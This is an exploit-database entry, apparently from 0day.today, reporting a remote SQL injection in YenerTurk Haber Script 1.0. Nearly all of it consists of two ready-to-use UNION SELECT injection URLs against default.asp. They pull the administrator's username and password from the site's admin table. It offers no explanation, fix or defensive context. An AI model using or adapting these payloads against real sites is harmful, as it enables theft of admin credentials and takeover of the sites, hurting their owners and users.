id: 657
date: 08/06/2006
title: YenerTurk Haber Script 1.0 Remote SQL Injection Vulnerability
author: ASIANEAGLE
cves: 

=============================================================
YenerTurk Haber Script 1.0 Remote SQL Injection Vulnerability
=============================================================



#YenerTurk Haber Script v1.0 SQL Injection Vulnebrality 
#Credit:ASIANEAGLE                                      
                        


#Exploit:
Admin Nick:
http://[SITE]/Path to YenerTurk/default.asp?x=2&kategori=11&id=-1%20union%20select%200,kullanici_adi,2,3,4,5,6,7,8%20from%20admin%20where%20id%20like%201
Admin pass:
http://[SITE]/Path to YenerTurk/default.asp?x=2&kategori=11&id=-1%20union%20select%200,sifre,2,3,4,5,6,7,8%20from%20admin%20where%20id%20like%201



#  0day.today [2023-03-22]  #